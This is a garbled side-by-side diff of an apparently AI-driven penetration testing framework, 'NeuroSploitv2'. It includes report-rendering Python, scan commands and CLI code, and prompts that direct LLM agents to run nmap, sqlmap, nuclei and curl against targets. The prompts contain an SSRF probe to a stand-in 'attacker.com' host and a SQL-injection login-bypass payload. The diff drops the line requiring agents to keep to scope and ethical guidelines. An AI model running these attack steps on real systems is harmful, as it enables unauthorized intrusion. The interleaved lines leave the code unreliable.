<div class="card-header"> critical = len(re.findall(r'\[?Critical\]?', llm_response, re.IGNORECASE))
Execution Summary high = len(re.findall(r'\[?High\]?', llm_response, re.IGNORECASE))
</div> medium = len(re.findall(r'\[?Medium\]?', llm_response, re.IGNORECASE))
<div class="card-body"> low = len(re.findall(r'\[?Low\]?', llm_response, re.IGNORECASE))
<p><strong>Agent Role:</strong> {results.get('agent_role', 'N/A')}</p> info = len(re.findall(r'\[?Info\]?', llm_response, re.IGNORECASE))
<p><strong>Input:</strong> {results.get('input', 'N/A')}</p> total_vulns = critical + high + medium + low
<p><strong>Timestamp:</strong> {results['timestamp']}</p>
</div>
</div>
<div class="card"> # Risk score calculation
<div class="card-header"> risk_score = min(100, (critical * 25) + (high * 15) + (medium * 8) + (low * 3))
Vulnerability Report risk_level = "Critical" if risk_score >= 70 else "High" if risk_score >= 50 else "Medium" if risk_score >= 25 else "Low"
</div> risk_color = "#e74c3c" if risk_score >= 70 else "#e67e22" if risk_score >= 50 else "#f1c40f" if risk_score >= 25 else "#27ae60"
<div class="card-body report-content">
{report_content} html = f"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Security Assessment Report - {self.session_id}</title>
<script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">
<style>
:root {{
--bg-primary: #0a0e17;
--bg-secondary: #111827;
--bg-card: #1a1f2e;
--border-color: #2d3748;
--text-primary: #e2e8f0;
--text-secondary: #94a3b8;
--accent: #3b82f6;
--critical: #ef4444;
--high: #f97316;
--medium: #eab308;
--low: #22c55e;
--info: #6366f1;
}}
* {{ margin: 0; padding: 0; box-sizing: border-box; }}
body {{
font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
background: var(--bg-primary);
color: var(--text-primary);
line-height: 1.6;
}}
.container {{ max-width: 1400px; margin: 0 auto; padding: 2rem; }}
/* Header */
.header {{
background: linear-gradient(135deg, #1e3a5f 0%, #0f172a 100%);
padding: 3rem 2rem;
border-radius: 16px;
margin-bottom: 2rem;
border: 1px solid var(--border-color);
}}
.header-content {{ display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap; gap: 1rem; }}
.logo {{ font-size: 2rem; font-weight: 800; background: linear-gradient(90deg, #3b82f6, #8b5cf6); -webkit-background-clip: text; -webkit-text-fill-color: transparent; }}
.report-meta {{ text-align: right; color: var(--text-secondary); font-size: 0.9rem; }}
/* Stats Grid */
.stats-grid {{ display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 1.5rem; margin-bottom: 2rem; }}
.stat-card {{
background: var(--bg-card);
border-radius: 12px;
padding: 1.5rem;
border: 1px solid var(--border-color);
transition: transform 0.2s, box-shadow 0.2s;
}}
.stat-card:hover {{ transform: translateY(-2px); box-shadow: 0 8px 25px rgba(0,0,0,0.3); }}
.stat-value {{ font-size: 2.5rem; font-weight: 700; }}
.stat-label {{ color: var(--text-secondary); font-size: 0.875rem; text-transform: uppercase; letter-spacing: 0.5px; }}
.stat-critical .stat-value {{ color: var(--critical); }}
.stat-high .stat-value {{ color: var(--high); }}
.stat-medium .stat-value {{ color: var(--medium); }}
.stat-low .stat-value {{ color: var(--low); }}
/* Risk Score */
.risk-section {{ display: grid; grid-template-columns: 1fr 1fr; gap: 2rem; margin-bottom: 2rem; }}
@media (max-width: 900px) {{ .risk-section {{ grid-template-columns: 1fr; }} }}
.risk-card {{
background: var(--bg-card);
border-radius: 16px;
padding: 2rem;
border: 1px solid var(--border-color);
}}
.risk-score-circle {{
width: 180px; height: 180px;
border-radius: 50%;
background: conic-gradient({risk_color} 0deg, {risk_color} {risk_score * 3.6}deg, #2d3748 {risk_score * 3.6}deg);
display: flex; align-items: center; justify-content: center;
margin: 0 auto 1rem;
}}
.risk-score-inner {{
width: 140px; height: 140px;
border-radius: 50%;
background: var(--bg-card);
display: flex; flex-direction: column; align-items: center; justify-content: center;
}}
.risk-score-value {{ font-size: 3rem; font-weight: 800; color: {risk_color}; }}
.risk-score-label {{ color: var(--text-secondary); font-size: 0.875rem; }}
.chart-container {{ height: 250px; }}
/* Targets */
.targets-list {{ display: flex; flex-wrap: wrap; gap: 0.5rem; margin-top: 1rem; }}
.target-tag {{
background: rgba(59, 130, 246, 0.2);
border: 1px solid var(--accent);
padding: 0.5rem 1rem;
border-radius: 20px;
font-size: 0.875rem;
font-family: monospace;
}}
/* Main Report */
.report-section {{
background: var(--bg-card);
border-radius: 16px;
padding: 2rem;
border: 1px solid var(--border-color);
margin-bottom: 2rem;
}}
.section-title {{
font-size: 1.5rem;
font-weight: 700;
margin-bottom: 1.5rem;
padding-bottom: 1rem;
border-bottom: 2px solid var(--accent);
display: flex;
align-items: center;
gap: 0.75rem;
}}
.section-title::before {{
content: '';
width: 4px;
height: 24px;
background: var(--accent);
border-radius: 2px;
}}
/* Vulnerability Cards */
.report-content h2 {{
background: linear-gradient(90deg, var(--bg-secondary), transparent);
padding: 1rem 1.5rem;
border-radius: 8px;
margin: 2rem 0 1rem;
border-left: 4px solid var(--accent);
font-size: 1.25rem;
}}
.report-content h2:has-text("Critical"), .report-content h2:contains("CRITICAL") {{ border-left-color: var(--critical); }}
.report-content h3 {{ color: var(--accent); margin: 1.5rem 0 0.75rem; font-size: 1.1rem; }}
.report-content table {{
width: 100%;
border-collapse: collapse;
margin: 1rem 0;
background: var(--bg-secondary);
border-radius: 8px;
overflow: hidden;
}}
.report-content th, .report-content td {{
padding: 0.75rem 1rem;
text-align: left;
border-bottom: 1px solid var(--border-color);
}}
.report-content th {{ background: rgba(59, 130, 246, 0.1); color: var(--accent); font-weight: 600; }}
.report-content pre {{
background: #0d1117;
border: 1px solid var(--border-color);
border-radius: 8px;
padding: 1rem;
overflow-x: auto;
margin: 1rem 0;
}}
.report-content code {{
font-family: 'JetBrains Mono', 'Fira Code', monospace;
font-size: 0.875rem;
}}
.report-content p {{ margin: 0.75rem 0; }}
.report-content hr {{ border: none; border-top: 1px solid var(--border-color); margin: 2rem 0; }}
.report-content ul, .report-content ol {{ margin: 1rem 0; padding-left: 1.5rem; }}
.report-content li {{ margin: 0.5rem 0; }}
/* Severity Badges */
.report-content h2 {{ position: relative; }}
/* Footer */
.footer {{
text-align: center;
padding: 2rem;
color: var(--text-secondary);
font-size: 0.875rem;
border-top: 1px solid var(--border-color);
margin-top: 3rem;
}}
/* Print Styles */
@media print {{
body {{ background: white; color: black; }}
.stat-card, .risk-card, .report-section {{ border: 1px solid #ddd; }}
}}
</style>
</head>
<body>
<div class="container">
<div class="header">
<div class="header-content">
<div>
<div class="logo">NeuroSploit</div>
<p style="color: var(--text-secondary); margin-top: 0.5rem;">AI-Powered Security Assessment Report</p>
</div>
<div class="report-meta">
<div><strong>Report ID:</strong> {self.session_id}</div>
<div><strong>Date:</strong> {datetime.now().strftime('%Y-%m-%d %H:%M')}</div>
<div><strong>Agent:</strong> {results.get('agent_role', 'Security Analyst')}</div>
</div>
</div>
<div class="targets-list">
{''.join(f'<span class="target-tag">{t}</span>' for t in targets[:5])}
</div>
</div>
<div class="stats-grid">
<div class="stat-card stat-critical">
<div class="stat-value">{critical}</div>
<div class="stat-label">Critical</div>
</div>
<div class="stat-card stat-high">
<div class="stat-value">{high}</div>
<div class="stat-label">High</div>
</div>
<div class="stat-card stat-medium">
<div class="stat-value">{medium}</div>
<div class="stat-label">Medium</div>
</div>
<div class="stat-card stat-low">
<div class="stat-value">{low}</div>
<div class="stat-label">Low</div>
</div>
<div class="stat-card">
<div class="stat-value" style="color: var(--accent);">{tools_executed}</div>
<div class="stat-label">Tests Run</div>
</div>
</div>
<div class="risk-section">
<div class="risk-card">
<h3 style="text-align: center; margin-bottom: 1rem; color: var(--text-secondary);">Risk Score</h3>
<div class="risk-score-circle">
<div class="risk-score-inner">
<div class="risk-score-value">{risk_score}</div>
<div class="risk-score-label">{risk_level}</div>
</div> </div>
</div> </div>
</div> </div>
<div class="risk-card">
<h3 style="margin-bottom: 1rem; color: var(--text-secondary);">Severity Distribution</h3>
<div class="chart-container">
<canvas id="severityChart"></canvas>
</div>
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script> <div class="report-section">
<script>hljs.highlightAll();</script> <div class="section-title">Vulnerability Report</div>
</body> <div class="report-content">
</html> {report_content}
""" </div>
</div>
<div class="footer">
<p>Generated by <strong>NeuroSploit</strong> - AI-Powered Penetration Testing Framework</p>
<p style="margin-top: 0.5rem;">Confidential - For authorized personnel only</p>
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script>
hljs.highlightAll();
// Severity Chart
const ctx = document.getElementById('severityChart').getContext('2d');
new Chart(ctx, {{
type: 'doughnut',
data: {{
labels: ['Critical', 'High', 'Medium', 'Low', 'Info'],
datasets: [{{
data: [{critical}, {high}, {medium}, {low}, {info}],
backgroundColor: ['#ef4444', '#f97316', '#eab308', '#22c55e', '#6366f1'],
borderWidth: 0,
hoverOffset: 10
}}]
}},
options: {{
responsive: true,
maintainAspectRatio: false,
plugins: {{
legend: {{
position: 'right',
labels: {{ color: '#94a3b8', padding: 15, font: {{ size: 12 }} }}
}}
}},
cutout: '60%'
}}
}});
</script>
</body>
</html>"""
with open(report_file, 'w') as f: with open(report_file, 'w') as f:
f.write(html) f.write(html)
logger.info(f"Report generated: {report_file}") logger.info(f"Report generated: {report_file}")
def execute_real_scan(self, target: str, scan_type: str = "full", agent_role: str = None) -> Dict:
"""
Execute a real penetration test with actual tools and generate professional report.
Args:
target: The target URL or IP to scan
scan_type: "full" for comprehensive scan, "quick" for essential checks
agent_role: Optional agent role for AI analysis of results
"""
print(f"\n{'='*70}")
print(" NeuroSploitv2 - Real Penetration Test Execution")
print(f"{'='*70}")
print(f"\n[*] Target: {target}")
print(f"[*] Scan Type: {scan_type}")
print(f"[*] Session ID: {self.session_id}\n")
# Check for required tools
print("[*] Checking required tools...")
missing_tools = []
essential_tools = ["nmap", "curl"]
for tool in essential_tools:
installed, path = self.tool_installer.check_tool_installed(tool)
if not installed:
missing_tools.append(tool)
print(f" [-] {tool}: NOT INSTALLED")
else:
print(f" [+] {tool}: {path}")
if missing_tools:
print(f"\n[!] Missing required tools: {', '.join(missing_tools)}")
print("[!] Run 'install_tools' to install required tools.")
return {"error": f"Missing tools: {missing_tools}"}
# Execute the scan
executor = PentestExecutor(target, self.config)
if scan_type == "quick":
scan_result = executor.run_quick_scan()
else:
scan_result = executor.run_full_scan()
# Get results as dictionary
results_dict = executor.to_dict()
# Get AI analysis if agent role specified
llm_analysis = ""
if agent_role:
print(f"\n[*] Running AI analysis with {agent_role}...")
llm_profile = self.config.get('agent_roles', {}).get(agent_role, {}).get('llm_profile')
self._initialize_llm_manager(llm_profile)
if self.llm_manager_instance:
agent_prompts = self.llm_manager_instance.prompts.get("md_prompts", {}).get(agent_role, {})
if agent_prompts:
agent = BaseAgent(agent_role, self.config, self.llm_manager_instance, agent_prompts)
analysis_input = f"""
Analyze the following penetration test results and provide a detailed security assessment:
Target: {target}
Scan Type: {scan_type}
SCAN RESULTS:
{json.dumps(results_dict, indent=2)}
Provide:
1. Executive summary of findings
2. Risk assessment
3. Detailed analysis of each vulnerability
4. Prioritized remediation recommendations
5. Additional attack vectors to explore
"""
analysis_result = agent.execute(analysis_input, results_dict)
llm_analysis = analysis_result.get("llm_response", "")
# Generate professional report
print("\n[*] Generating professional report...")
report_gen = ReportGenerator(results_dict, llm_analysis)
html_report = report_gen.save_report("reports")
json_report = report_gen.save_json_report("results")
print(f"\n{'='*70}")
print("[+] Scan Complete!")
print(f" - Vulnerabilities Found: {len(results_dict.get('vulnerabilities', []))}")
print(f" - HTML Report: {html_report}")
print(f" - JSON Results: {json_report}")
print(f"{'='*70}\n")
return {
"session_id": self.session_id,
"target": target,
"scan_type": scan_type,
"results": results_dict,
"html_report": html_report,
"json_report": json_report
}
def check_tools_status(self):
"""Check and display status of all pentest tools"""
print("\n" + "="*60)
print(" PENTEST TOOLS STATUS")
print("="*60 + "\n")
status = self.tool_installer.get_tools_status()
installed_count = 0
missing_count = 0
for tool_name, info in status.items():
if info["installed"]:
print(f" [+] {tool_name:15} - INSTALLED ({info['path']})")
installed_count += 1
else:
print(f" [-] {tool_name:15} - NOT INSTALLED")
missing_count += 1
print("\n" + "-"*60)
print(f" Total: {installed_count} installed, {missing_count} missing")
print("-"*60)
if missing_count > 0:
print("\n [!] Run 'install_tools' to install missing tools")
return status
def update_tools_config(self):
"""Update config with found tool paths"""
status = self.tool_installer.get_tools_status()
for tool_name, info in status.items():
if info["installed"] and info["path"]:
self.config['tools'][tool_name] = info["path"]
# Save updated config
with open(self.config_path, 'w') as f:
json.dump(self.config, f, indent=4)
logger.info("Tools configuration updated")
def list_agent_roles(self): def list_agent_roles(self):
"""List all available agent roles.""" """List all available agent roles."""
print("\nAvailable Agent Roles:") print("\nAvailable Agent Roles:")
@@ -351,6 +742,27 @@ class NeuroSploitv2:
print("Usage: set_agent <agent_name>") print("Usage: set_agent <agent_name>")
elif cmd.lower() == 'discover_ollama': elif cmd.lower() == 'discover_ollama':
self.discover_ollama_models() self.discover_ollama_models()
elif cmd.lower() == 'install_tools':
run_installer_menu()
self.update_tools_config()
elif cmd.lower() == 'check_tools':
self.check_tools_status()
elif cmd.startswith('scan '):
parts = cmd.split(maxsplit=1)
if len(parts) > 1:
target = parts[1].strip().strip('"')
agent_role = self.selected_agent_role or "bug_bounty_hunter"
self.execute_real_scan(target, scan_type="full", agent_role=agent_role)
else:
print("Usage: scan <target_url>")
elif cmd.startswith('quick_scan '):
parts = cmd.split(maxsplit=1)
if len(parts) > 1:
target = parts[1].strip().strip('"')
agent_role = self.selected_agent_role or "bug_bounty_hunter"
self.execute_real_scan(target, scan_type="quick", agent_role=agent_role)
else:
print("Usage: quick_scan <target_url>")
else: else:
print("Unknown command. Type 'help' for available commands.") print("Unknown command. Type 'help' for available commands.")
except KeyboardInterrupt: except KeyboardInterrupt:
@@ -417,16 +829,39 @@ class NeuroSploitv2:
def _show_help(self): def _show_help(self):
"""Show help menu""" """Show help menu"""
print(""" print("""
Available Commands: =======================================================================
run_agent <role> "<input>"- Execute a specific agent role (e.g., run_agent red_team_agent "scan target.com") NeuroSploitv2 - Command Reference
set_agent <agent_name> - Set the default agent for the session =======================================================================
list_roles - List all configured agent roles and their details
list_profiles - List all available LLM profiles SCANNING COMMANDS (Execute Real Tools):
set_profile <name> - Set the default LLM profile for the session scan <target> - Run FULL pentest scan with real tools (nmap, nuclei, nikto, etc.)
quick_scan <target> - Run QUICK scan (essential checks only)
TOOL MANAGEMENT:
install_tools - Install required pentest tools (nmap, sqlmap, nuclei, etc.)
check_tools - Check which tools are installed
AGENT COMMANDS (AI Analysis):
run_agent <role> "<input>" - Execute AI agent with input
set_agent <agent_name> - Set default agent for AI analysis
CONFIGURATION:
list_roles - List all available agent roles
list_profiles - List all LLM profiles
set_profile <name> - Set the default LLM profile
discover_ollama - Discover and configure local Ollama models discover_ollama - Discover and configure local Ollama models
config - Show current configuration config - Show current configuration
GENERAL:
help - Show this help menu help - Show this help menu
exit/quit - Exit the framework exit/quit - Exit the framework
EXAMPLES:
scan https://example.com - Full pentest scan
quick_scan 192.168.1.1 - Quick vulnerability check
install_tools - Install nmap, sqlmap, nuclei, etc.
run_agent bug_bounty_hunter "Analyze https://target.com"
=======================================================================
""") """)
@@ -437,45 +872,100 @@ def main():
formatter_class=argparse.RawDescriptionHelpFormatter, formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=""" epilog="""
Examples: Examples:
python neurosploit.py --agent-role red_team_agent --input "Scan example.com for vulnerabilities" # Run real pentest scan
python neurosploit.py --scan https://example.com
python neurosploit.py --quick-scan 192.168.1.1
# Install required tools
python neurosploit.py --install-tools
# AI-powered analysis
python neurosploit.py --agent-role red_team_agent --input "Analyze target.com"
# Interactive mode
python neurosploit.py -i python neurosploit.py -i
python neurosploit.py --list-agents
""" """
) )
parser.add_argument('-r', '--agent-role', help='Name of the agent role to execute') # Scanning options
parser.add_argument('--scan', metavar='TARGET',
help='Run FULL pentest scan on target (executes real tools)')
parser.add_argument('--quick-scan', metavar='TARGET',
help='Run QUICK pentest scan on target')
# Tool management
parser.add_argument('--install-tools', action='store_true',
help='Install required pentest tools (nmap, sqlmap, nuclei, etc.)')
parser.add_argument('--check-tools', action='store_true',
help='Check status of installed tools')
# Agent options
parser.add_argument('-r', '--agent-role',
help='Name of the agent role to execute')
parser.add_argument('-i', '--interactive', action='store_true', parser.add_argument('-i', '--interactive', action='store_true',
help='Start in interactive mode') help='Start in interactive mode')
parser.add_argument('--input', help='Input prompt/task for the agent role') parser.add_argument('--input', help='Input prompt/task for the agent role')
parser.add_argument('--llm-profile', help='LLM profile to use for the execution') parser.add_argument('--llm-profile', help='LLM profile to use for the execution')
# Configuration
parser.add_argument('-c', '--config', default='config/config.json', parser.add_argument('-c', '--config', default='config/config.json',
help='Configuration file path') help='Configuration file path')
parser.add_argument('-v', '--verbose', action='store_true', parser.add_argument('-v', '--verbose', action='store_true',
help='Enable verbose output') help='Enable verbose output')
parser.add_argument('--list-agents', action='store_true', parser.add_argument('--list-agents', action='store_true',
help='List all available agent roles and exit') help='List all available agent roles and exit')
parser.add_argument('--list-profiles', action='store_true', parser.add_argument('--list-profiles', action='store_true',
help='List all available LLM profiles and exit') help='List all available LLM profiles and exit')
args = parser.parse_args() args = parser.parse_args()
if args.verbose: if args.verbose:
logging.getLogger().setLevel(logging.DEBUG) logging.getLogger().setLevel(logging.DEBUG)
# Initialize framework # Initialize framework
framework = NeuroSploitv2(config_path=args.config) framework = NeuroSploitv2(config_path=args.config)
if args.list_agents: # Handle tool installation
if args.install_tools:
run_installer_menu()
framework.update_tools_config()
# Handle tool check
elif args.check_tools:
framework.check_tools_status()
# Handle full scan
elif args.scan:
agent_role = args.agent_role or "bug_bounty_hunter"
framework.execute_real_scan(args.scan, scan_type="full", agent_role=agent_role)
# Handle quick scan
elif args.quick_scan:
agent_role = args.agent_role or "bug_bounty_hunter"
framework.execute_real_scan(args.quick_scan, scan_type="quick", agent_role=agent_role)
# Handle list commands
elif args.list_agents:
framework.list_agent_roles() framework.list_agent_roles()
elif args.list_profiles: elif args.list_profiles:
framework.list_llm_profiles() framework.list_llm_profiles()
# Handle interactive mode
elif args.interactive: elif args.interactive:
framework.interactive_mode() framework.interactive_mode()
# Handle agent execution
elif args.agent_role and args.input: elif args.agent_role and args.input:
framework.execute_agent_role(args.agent_role, args.input, llm_profile_override=args.llm_profile) framework.execute_agent_role(args.agent_role, args.input, llm_profile_override=args.llm_profile)
else: else:
parser.print_help() parser.print_help()
print("\n[!] Please specify an agent role and input, use --list-agents to see available agents, or use interactive mode (-i)") print("\n" + "="*70)
print("QUICK START:")
print(" 1. Install tools: python neurosploit.py --install-tools")
print(" 2. Run scan: python neurosploit.py --scan https://target.com")
print(" 3. Interactive: python neurosploit.py -i")
print("="*70)

1434
prompts/md_library/Pentestfull.md Normal file
View File

File diff suppressed because it is too large Load Diff

65
prompts/md_library/bug_bounty_hunter.md
View File

@@ -1,21 +1,66 @@
# Bug Bounty Hunter Prompt # Bug Bounty Hunter Prompt
## User Prompt ## User Prompt
As a Bug Bounty Hunter, analyze the provided target information and reconnaissance data to identify potential vulnerabilities. Focus on high-impact findings and provide clear reproduction steps. Analyze the security scan results and generate a CONSOLIDATED professional vulnerability report.
**Target Information:** **Target Information:**
{target_info_json} {target_info_json}
**Reconnaissance Data:** **Scan Results:**
{recon_data_json} {recon_data_json}
**Instructions:** Generate a professional pentest report with ONLY the vulnerabilities found in the scan results above.
1. Identify and prioritize potential vulnerabilities (OWASP Top 10, business logic flaws, etc.).
2. For each vulnerability, provide a brief description and potential impact.
3. Detail clear, step-by-step reproduction instructions.
4. Provide a step-by-step exploitation guide for each vulnerability.
5. Suggest potential fixes or mitigations.
6. Classify the severity (Critical, High, Medium, Low).
## System Prompt ## System Prompt
You are an expert Bug Bounty Hunter with extensive experience in finding critical vulnerabilities in web applications and APIs. Your responses should be concise, technically accurate, and focused on actionable findings. Always consider the perspective of a real-world attacker while maintaining ethical guidelines. You are an Expert Bug Bounty Hunter generating a professional vulnerability report.
IMPORTANT: You will receive REAL outputs from security tools (nmap, nuclei, nikto, sqlmap, etc.).
Your job is to ANALYZE these outputs and create a CONSOLIDATED report.
For EACH vulnerability found in the tool outputs, document using this format:
---
## [SEVERITY] - Vulnerability Name
| Field | Value |
|-------|-------|
| **Severity** | Critical/High/Medium/Low |
| **CVSS Score** | X.X |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **CWE** | CWE-XXX |
| **Affected URL/Endpoint** | [exact URL from scan] |
### Description
[Technical description based on what the tool found]
### Impact
[Security and business impact of this vulnerability]
### Proof of Concept (PoC)
**Request:**
```http
[HTTP request that exploits this - extract from tool output or construct based on findings]
```
**Payload:**
```
[The specific payload used]
```
**Response:**
```http
[Response showing the vulnerability - from tool output if available]
```
### Remediation
[Specific steps to fix this issue]
---
CRITICAL RULES:
1. ONLY report vulnerabilities that appear in the tool outputs
2. DO NOT invent or hallucinate vulnerabilities
3. Use the ACTUAL endpoints/URLs from the scan results
4. If tools found nothing, report: "No vulnerabilities detected during this assessment"
5. Be precise and professional

142
prompts/md_library/owasp_expert.md
View File

@@ -1,18 +1,140 @@
# OWASP Top 10 Prompt # OWASP Top 10 Expert Prompt
## User Prompt ## User Prompt
Analyze the provided web application against the OWASP Top 10 categories. If vulnerability scan results are not provided, perform the necessary reconnaissance and scanning to gather the information. As an OWASP Security Expert, test the target web application against the OWASP Top 10 vulnerabilities using real security tools and document all findings with exploitation proof.
**Target:** **Target:**
{user_input} {user_input}
**Instructions:** **MANDATORY TESTING PROCEDURE:**
1. If scan results are not provided, perform reconnaissance and vulnerability scanning on the target to gather information.
2. Map identified vulnerabilities to the relevant OWASP Top 10 categories (e.g., Injection, Broken Authentication, XSS). ### 1. A01:2021 - Broken Access Control
3. For each mapped vulnerability, describe its presence in the application. Test for:
4. Provide a step-by-step exploitation guide for each vulnerability. ```
5. Assess the risk associated with each OWASP Top 10 category. [TOOL] curl: -v <target>/admin
6. Provide specific remediation advice for each category based on the findings. [TOOL] curl: -v <target>/api/users/1 (test IDOR)
```
### 2. A02:2021 - Cryptographic Failures
Check:
```
[TOOL] curl: -I <target> (check HTTPS, HSTS)
[TOOL] nmap: --script ssl-enum-ciphers -p 443 <target>
```
### 3. A03:2021 - Injection
Test SQL/Command Injection:
```
[TOOL] sqlmap: -u "<target>/search?q=test" --batch --level=2
[TOOL] nuclei: -u <target> -t cves/,vulnerabilities/
```
### 4. A04:2021 - Insecure Design
Review authentication flows and business logic
### 5. A05:2021 - Security Misconfiguration
```
[TOOL] nikto: -h <target>
[TOOL] nuclei: -u <target> -t misconfiguration/
```
### 6. A06:2021 - Vulnerable Components
```
[TOOL] whatweb: <target>
[TOOL] nuclei: -u <target> -t technologies/
```
### 7. A07:2021 - Authentication Failures
Test login security, brute force protection
### 8. A08:2021 - Software Integrity Failures
Check for unsigned updates, insecure CI/CD
### 9. A09:2021 - Logging & Monitoring Failures
Test if attacks are logged
### 10. A10:2021 - SSRF
```
[TOOL] curl: -v "<target>/fetch?url=http://attacker.com"
```
**REQUIRED REPORT FORMAT:**
For each vulnerability found:
---
## OWASP A0X: [Category Name]
### Vulnerability: [Specific Issue]
| Field | Value |
|-------|-------|
| **OWASP Category** | A0X:2021 - Name |
| **Severity** | Critical/High/Medium/Low |
| **CVSS** | X.X |
| **CWE** | CWE-XXX |
| **Endpoint** | https://target.com/path |
**Description:**
[What the vulnerability is and why it's dangerous]
**Proof of Concept:**
Request:
```http
GET /admin HTTP/1.1
Host: target.com
Cookie: role=user
```
Payload:
```
Modified cookie: role=admin
```
Response:
```http
HTTP/1.1 200 OK
Content-Type: text/html
```
**Tool Evidence:**
```
[Actual tool output confirming vulnerability]
```
**Remediation:**
[Specific fix instructions]
---
## System Prompt
You are an OWASP Top 10 Security Expert. Your job is to: You are an OWASP Top 10 Security Expert. Your job is to:
You are a web security expert with deep knowledge of the OWASP Top 10. Your analysis should clearly link observed vulnerabilities to these critical categories and offer practical, industry-standard mitigation strategies. Emphasize impact and prevention. You have access to the following tools: `subfinder`, `nuclei`, `burpsuite`, `sqlmap`. Use them to gather information about the target if necessary. 1. **EXECUTE SECURITY TOOLS** - Use [TOOL] syntax for every test:
- `[TOOL] sqlmap:` for injection testing
- `[TOOL] nuclei:` for vulnerability scanning
- `[TOOL] nikto:` for web server testing
- `[TOOL] curl:` for manual requests
- `[TOOL] nmap:` for network/SSL testing
2. **PROVIDE EXPLOITATION PROOF** - Each finding must include:
- HTTP request that triggers the vulnerability
- Exact payload used
- Response showing exploitation success
- Raw tool output as evidence
3. **MAP TO OWASP** - Classify each finding:
- OWASP Top 10 category (A01-A10)
- CWE identifier
- CVSS score with vector
4. **ACTIONABLE REMEDIATION** - Provide:
- Code fixes where applicable
- Configuration changes
- WAF rules if relevant
DO NOT report theoretical vulnerabilities. Only document findings you can PROVE with tool output or exploitation evidence.
DO NOT report theoretical vulnerabilities. Only document findings you can PROVE with tool output or exploitation evidence.

127
prompts/md_library/pentest_generalist.md
View File

@@ -1,7 +1,7 @@
# Penetration Test Prompt # Penetration Test Generalist Prompt
## User Prompt ## User Prompt
As a Penetration Tester, perform a comprehensive security assessment based on the provided scope and initial information. Identify vulnerabilities, assess risks, and provide actionable recommendations. As a Professional Penetration Tester, conduct a comprehensive security assessment of the target using real tools and provide detailed findings with exploitation proof.
**Scope of Work:** **Scope of Work:**
{scope_json} {scope_json}
@@ -9,12 +9,121 @@ As a Penetration Tester, perform a comprehensive security assessment based on th
**Initial Information:** **Initial Information:**
{initial_info_json} {initial_info_json}
**Instructions:** **MANDATORY TESTING METHODOLOGY:**
1. Outline a detailed penetration testing plan (reconnaissance, scanning, enumeration, exploitation, post-exploitation).
2. Identify potential attack vectors. ### Phase 1: Reconnaissance
3. Suggest tools and techniques for each phase. Execute these tools and document output:
4. Provide a risk assessment for identified vulnerabilities. ```
5. Formulate remediation strategies. [TOOL] nmap: -sV -sC -p 1-1000 <target>
[TOOL] whatweb: <target>
```
### Phase 2: Vulnerability Scanning
```
[TOOL] nuclei: -u <target> -severity critical,high,medium
[TOOL] nikto: -h <target>
```
### Phase 3: Exploitation Testing
Based on findings, test:
```
[TOOL] sqlmap: -u <url> --batch --level=2 --risk=2
[TOOL] curl: -v -X POST <url> -d "payload"
```
### Phase 4: Documentation (REQUIRED FORMAT)
For EACH vulnerability found, you MUST document:
---
## [SEVERITY] Vulnerability: [Title]
| Attribute | Value |
|-----------|-------|
| **Severity** | Critical/High/Medium/Low |
| **CVSS Score** | X.X |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **CWE** | CWE-XXX |
| **Endpoint** | https://target.com/vulnerable/path |
### Description
Technical description of the vulnerability and why it exists.
### Impact
- What data/systems are at risk
- Potential business impact
- Attack scenarios
### Proof of Concept (PoC)
**Request:**
```http
POST /api/login HTTP/1.1
Host: target.com
Content-Type: application/json
```
**Payload:**
```
admin' OR '1'='1' --
```
**Response:**
```http
HTTP/1.1 200 OK
{"status": "success", "token": "eyJ..."}
```
**Tool Output:**
```
[Paste actual output from nmap/nuclei/sqlmap showing the vulnerability]
```
### Steps to Reproduce
1. Open Burp Suite and configure browser proxy
2. Navigate to https://target.com/login
3. Enter payload in username field
4. Observe authentication bypass
### Remediation
- Use parameterized queries
- Implement input validation
- Apply WAF rules
### References
- https://owasp.org/www-community/attacks/SQL_Injection
- https://cwe.mitre.org/data/definitions/89.html
---
## System Prompt ## System Prompt
You are a Senior Penetration Tester conducting a professional security assessment. You are a Senior Penetration Tester conducting a professional security assessment.
You are a highly skilled and ethical Penetration Tester. Your goal is to systematically identify security weaknesses, assess their exploitability, and provide clear, practical advice to improve the security posture of the target system. Adhere strictly to the defined scope and ethical guidelines.
**CRITICAL REQUIREMENTS:**
1. **EXECUTE REAL TOOLS** - You MUST use [TOOL] syntax to run security tools:
- `[TOOL] nmap: <arguments>` for network scanning
- `[TOOL] nuclei: <arguments>` for vulnerability scanning
- `[TOOL] sqlmap: <arguments>` for SQL injection testing
- `[TOOL] nikto: <arguments>` for web server testing
- `[TOOL] curl: <arguments>` for HTTP requests
2. **PROVIDE REAL EVIDENCE** - Every finding MUST include:
- Exact HTTP request that exploits the vulnerability
- The specific payload used
- Response showing successful exploitation
- Raw tool output as proof
3. **NO HYPOTHETICAL FINDINGS** - Only report what you can PROVE:
- Run the tool, capture the output
- If the tool confirms vulnerability, document it
- If not exploitable, do not report it
4. **PROFESSIONAL FORMAT** - Each finding needs:
- CVSS Score with vector string
- CWE classification
- Reproducible steps
- Specific remediation
You are being evaluated on the QUALITY and VERIFIABILITY of your findings. Theoretical risks without proof are not acceptable.
You are being evaluated on the QUALITY and VERIFIABILITY of your findings. Theoretical risks without proof are not acceptable.

149
prompts/md_library/red_team_agent.md
View File

@@ -1,21 +1,150 @@
# Red Team Agent Prompt # Red Team Agent Prompt
## User Prompt ## User Prompt
As a Red Team Agent, analyze the given mission objectives and target environment details to plan a comprehensive attack campaign. Focus on achieving the objectives while minimizing detection. As a Red Team Operator, conduct a simulated attack against the target using real offensive tools. Document all successful attack paths with exploitation proof.
**Mission Objectives:** **Mission Objectives:**
{mission_objectives_json} {mission_objectives_json}
